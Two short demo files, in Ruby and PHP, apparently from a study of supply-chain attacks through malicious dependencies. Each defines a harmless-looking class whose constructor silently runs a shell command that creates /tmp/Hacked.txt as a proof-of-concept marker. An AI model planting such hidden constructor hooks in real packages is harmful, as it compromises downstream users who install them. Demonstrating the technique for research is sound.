File: runtime/r3-technique/ruby/procedure-1/malicious-dependency/MyClass.rb

# Define a class in the dependency, that we suppose is the popular
# one for which this 3rd-party dependency is tipically downloaded
# by downstream users
class MyClass
  def initialize(name)
    system('touch /tmp/Hacked.txt')
    @name = name
  end

  def say_hello
    "Hello from #{@name}!"
  end
end

File: runtime/r3-technique/php/procedure-1/malicious-dependency/MyClass.php
<?php
// Define a class in the dependency, that we suppose is the popular
// one for which this 3rd-party dependency is tipically downloaded
// by downstream users

class MyClass {
    private $name;

    public function __construct($name) {
        exec('touch /tmp/Hacked.txt');
        $this->name = $name;
    }

    public function sayHello() {
        return "Hello from " . $this->name . "!";
    }
}

?>
